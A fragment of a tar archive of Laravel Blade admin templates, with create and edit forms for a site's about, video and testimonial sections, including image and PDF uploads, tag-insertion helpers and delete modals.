</div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $item->order }}" required> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/about/create.blade.php���������������������������������������������������������0000644�����������������00000123342�14765366573�0015007 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.about') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('about.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/about-'.$style.'.jpg') }}" alt="draft image"> </div> </h4> @if (isset($item_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('about.update', $item_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 480 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item_section->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/about/'.$item_section->section_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item_section->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteModal{{ $item_section->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="video_type" class="col-form-label">{{ __('content.video_type') }}</label> <select class="form-control" name="video_type" id="video_type"> <option value="youtube" selected>{{ __('content.select_your_option') }} </option> <option value="youtube" {{ $item_section->video_type == 'youtube' ? 'selected' : '' }}>{{ __('content.youtube') }}</option> <option value="other" {{ $item_section->video_type == 'other' ? 'selected' : '' }}>{{ __('content.other') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="video_url">{{ __('content.video_url') }} </label> <input type="text" name="video_url" class="form-control" id="video_url" value="{{ $item_section->video_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title" value="{{ $item_section->section_title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <textarea name="description" class="form-control" id="description" rows="3">{{ $item_section->description }}</textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name" value="{{ $item_section->button_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url" value="{{ $item_section->button_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name_2">{{ __('content.button_name_2') }}</label> <input type="text" name="button_name_2" class="form-control" id="button_name_2" value="{{ $item_section->button_name_2 }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="cv_file">{{ __('content.pdf') }} (.pdf)</label> <input type="file" name="cv_file" class="form-control-file" id="cv_file"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item_section->cv_file)) <a class="d-block mx-auto" href="{{ asset('uploads/img/about/'.$item_section->cv_file) }}" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> {{ $item_section->cv_file }} </a> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> @if (!empty($item_section->cv_file)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteModal2{{ $item_section->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#aboutSectionDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('about.destroy_image', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="deleteModal2{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModal2CenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModal2CenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('about.destroy_image_2', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="aboutSectionDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="aboutSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="bannerSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('about.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('about.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 480 x 600) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="video_type" class="col-form-label">{{ __('content.video_type') }}</label> <select class="form-control" name="video_type" id="video_type"> <option value="youtube" selected>{{ __('content.select_your_option') }} </option> <option value="youtube">{{ __('content.youtube') }}</option> <option value="other">{{ __('content.other') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="video_url">{{ __('content.video_url') }} </label> <input type="text" name="video_url" class="form-control" id="video_url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="section_title">{{ __('content.section_title') }}</label> <input type="text" name="section_title" class="form-control" id="section_title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'section_title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'section_title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'section_title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'section_title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'section_title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'section_title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description">{{ __('content.description') }}</label> <textarea name="description" class="form-control" id="description" rows="3"></textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input type="text" name="button_name" class="form-control" id="button_name"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }}</label> <input type="text" name="button_url" class="form-control" id="button_url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name_2">{{ __('content.button_name_2') }}</label> <input type="text" name="button_name_2" class="form-control" id="button_name_2"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="cv_file">{{ __('content.pdf') }} (.pdf)</label> <input type="file" name="cv_file" class="form-control-file" id="cv_file"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> <!-- start about feature --> <div class="row"> <div class="col-12"> <div class="card mb-30"> <div class="card-body pb-0"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.features') }}</h6> <button type="button" class="btn btn-primary waves-effect waves-light float-right mb-3" data-toggle="modal" data-animation="bounce" data-target=".bs-example-modal-lg">+ {{ __('content.add_feature') }}</button> </div> <div class="table-responsive order-stats"> @if (count($features) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> <form onsubmit="return btnCheckListGet()" action="{{ route('about.destroy_feature_checked') }}" method="POST"> @method('DELETE') @csrf <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.title') }}</th> <th>{{ __('content.description') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($features); $asc=0; @endphp @foreach ($features as $feature) <tr> <td> <input name="check_list[]" type="checkbox" value="{{ $feature->id }}" onclick="showHideDeleteButton2(this)"> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td>@php echo html_entity_decode($feature->title); @endphp</td> <td>@php echo html_entity_decode($feature->description); @endphp</td> <td>{{ $feature->order }}</td> <td> <div> <a href="{{ route('about.edit_feature', $feature->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <form class="d-inline-block" action="{{ route('about.destroy_feature', $feature->id) }}" method="POST"> @csrf @method('DELETE') <span data-toggle="modal" data-target="#deleteModel{{ $feature->id }}"> <a type="button"> <i class="fa fa-trash text-danger font-18"></i> </a> </span> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $feature->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> </div> </td> </tr> @endforeach </tbody> </table> @else <p>{{ __('content.not_yet_created') }}</p> @endif </div> </div> </div> </div> </div><!-- end row --> <div class="modal fade bs-example-modal-lg" tabindex="-1" role="dialog" aria-labelledby="myLargeModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="myLargeModalLabel">{{ __('content.add_new') }}</h5><button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> <form action="{{ route('about.store_feature') }}" method="POST" enctype="multipart/form-data"> @csrf <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="title_2">{{ __('content.title') }} </label> <input type="text" name="title" class="form-control" id="title_2"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title_2')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title_2')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title_2')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title_2')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title_2')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title_2')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="description_2">{{ __('content.description') }} </label> <textarea name="description" class="form-control" id="description_2" rows="3"></textarea> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'description_2')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'description_2')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'description_2')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'description_2')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'description_2')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'description_2')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0" required> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> <!-- end about counter --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/video/create.blade.php���������������������������������������������������������0000644�����������������00000041141�14765366573�0014777 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.video') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('video.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> <!-- Button --> <a id="hoverButton" class="iyzi-btn"><i class="fas fa-camera"></i> {{ __('content.view_draft') }}</a> <!-- Modal --> <div id="imageModal" class="border border-success iyzi-modal"> <img class="img-fluid " src="{{ asset('uploads/img/dummy/style/video-'.$style.'.jpg') }}" alt="draft image"> </div> </h4> @if (isset($item_section)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('video.update', $item_section->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 1920 x 640) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($item_section->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/video/'.$item_section->section_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($item_section->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteModal{{ $item_section->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <div class="form-group"> <label for="video_type" class="col-form-label">{{ __('content.video_type') }}</label> <select class="form-control" name="video_type" id="video_type"> <option value="youtube" selected>{{ __('content.select_your_option') }} </option> <option value="youtube" {{ $item_section->video_type == 'youtube' ? 'selected' : '' }}>{{ __('content.youtube') }}</option> <option value="other" {{ $item_section->video_type == 'other' ? 'selected' : '' }}>{{ __('content.other') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="video_url">{{ __('content.video_url') }} </label> <input type="text" name="video_url" class="form-control" id="video_url" value="{{ $item_section->video_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title" value="{{ $item_section->title }}"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#videoSectionDestroyModal{{ $item_section->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('video.destroy_image', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="videoSectionDestroyModal{{ $item_section->id }}" tabindex="-1" role="dialog" aria-labelledby="videoSectionDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="bannerSectionDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('video.destroy', $item_section->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('video.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 1920 x 640) (.svg, .jpg, .jpeg, .png, .webp) </label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="video_type" class="col-form-label">{{ __('content.video_type') }}</label> <select class="form-control" name="video_type" id="video_type"> <option value="youtube" selected>{{ __('content.select_your_option') }} </option> <option value="youtube">{{ __('content.youtube') }}</option> <option value="other">{{ __('content.other') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="video_url">{{ __('content.video_url') }} </label> <input type="text" name="video_url" class="form-control" id="video_url"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="title">{{ __('content.title') }}</label> <input type="text" name="title" class="form-control" id="title"> <small class="form-text text-muted">{{ __('content.recommended_tags') }} <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('a', 'title')">{{ __('<a href="">') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('br', 'title')">{{ __('<br>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('b', 'title')">{{ __('<b>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('i', 'title')">{{ __('<i>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('span', 'title')">{{ __('<span>') }}</span> <span class="text-danger font-weight-bold custom-tag mr-1" onclick="insertTag('p', 'title')">{{ __('<p>') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/sections/testimonial/create.blade.php���������������������������������������������������0000644�����������������00000061241�14765366573�0016224 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.testimonials') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) 